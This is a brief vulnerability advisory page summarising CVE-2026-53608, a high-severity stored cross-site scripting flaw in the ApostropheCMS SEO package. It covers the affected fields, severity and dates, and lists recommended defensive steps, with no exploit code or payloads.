PatchSiren cyber security CVE debrief
CVE-2026-53608 apostrophecms CVE debrief
ApostropheCMS is an open-source Node.js content management system. Versions up to and including 1.4.2 of the `@apostrophecms/seo` package inject unsanitized user input into `<script>` tag bodies using JavaScript template literals. This allows any user with editor-level access to inject malicious JavaScript, resulting in stored XSS that executes on every page for every visitor. The vulnerability has a CVSS score of 8.7 and is classified as HIGH severity.
- Vendor
- apostrophecms
- Product
- @apostrophecms/seo
- CVSS
- HIGH 8.7
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-12
- Original CVE updated
- 2026-06-12
- Advisory published
- 2026-06-12
- Advisory updated
- 2026-06-12
Who should care
Users of ApostropheCMS with the `@apostrophecms/seo` package installed, particularly those with editor-level access.
Technical summary
The `@apostrophecms/seo` package directly injects user-controlled input (`seoGoogleTrackingId` and `seoGoogleTagManager`) into `<script>` tags without sanitization or validation. This allows for stored XSS attacks, which can be exploited by users with editor-level access.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade to a patched version of the `@apostrophecms/seo` package (if available).
- Restrict editor-level access to trusted users.
- Monitor for suspicious activity on the site.
Evidence notes
The vulnerability is confirmed by the CVE record and the NVD detail page. A security advisory is available on the ApostropheCMS GitHub page [ref-4].
Official resources
-
CVE-2026-53608 CVE record
CVE.org
-
CVE-2026-53608 NVD detail
NVD
-
Source item URL
nvd_modified
- Source reference
CVE-2026-53608 was published on 2026-06-12T22:16:52.660Z and has not been modified since then.